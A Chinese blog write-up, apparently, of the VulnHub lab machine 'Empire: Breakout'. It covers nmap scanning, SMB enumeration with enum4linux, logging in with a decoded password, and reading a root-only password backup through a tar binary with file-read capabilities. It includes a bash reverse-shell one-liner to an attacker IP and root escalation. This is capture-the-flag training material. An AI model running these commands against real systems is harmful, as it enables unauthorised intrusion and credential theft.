vulnhub-EMPIRE: BREAKOUT

Empire: Breakout ~ VulnHub

靶机:EMPIRE: BREAKOUT

 

攻击机:

kali linux

Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

信息收集

nmap 192.168.1.1/24

nmap -sS -sV -A -p- 192.168.1.107

 访问一下80端口

 在页面源码的最底部发现了加密字符串。

这个文件很像上一篇文章里的加密。这里就不在赘述解密过程。

解密后:

.2uqPEfj3D<P'a-3

看起来像是密码。暂时先放下。看看其他两个端口。

https://192.168.1.107:10000/

https://192.168.1.107:20000/

这两端口都是登陆界面。

暂时没有思路。刚才只是拿到了密码。

再仔细看namp的扫描结果,看到目标主机开通了445 139端口的smb服务。

 这里引入SMB利用命令:enum4linux。

enum4linux 192.168.1.107

发现了一个本地用户:cyber。

再拿之前解密的类似密码的字符串去登陆两个登陆界面。

20000端口的登陆成功。

然后,大家仔细看这里。这不是命令行的标志吗。

点开还真是。

那直接可以执行命令了。

开始收集命令:

这个又类似于一个密码。

再看一下那个可运行的tar文件,这里引入getcap命令。

查看一下。

貌似是任意读取文件的权限。

然后再大佬的指示下,找到了一个可疑文件,貌似是密码备份。但是普通用户没权限打开。这里就用到刚才的tar文件。

./tar -zcf pass.tar /var/backups/.old_pass.bak

 

再解压一下:

./tar -xvf passwd.tar

 

看到这个文件就成功了。

好像又是一个密码。

这里我们还需要反弹shell。

开启监听。开始执行shell。

bash -i >& /dev/tcp/192.168.1.108/4321 0>&1

 

成功弹出shell。

成功提权root。

这里是rOOt,刚开始我看成r00t。

这道题算是比较简单的了。知识点是新学习了getcap命令。

 

 

 

 

 

 

 

 

 

 

 

 

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大西瓜的安全之路

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值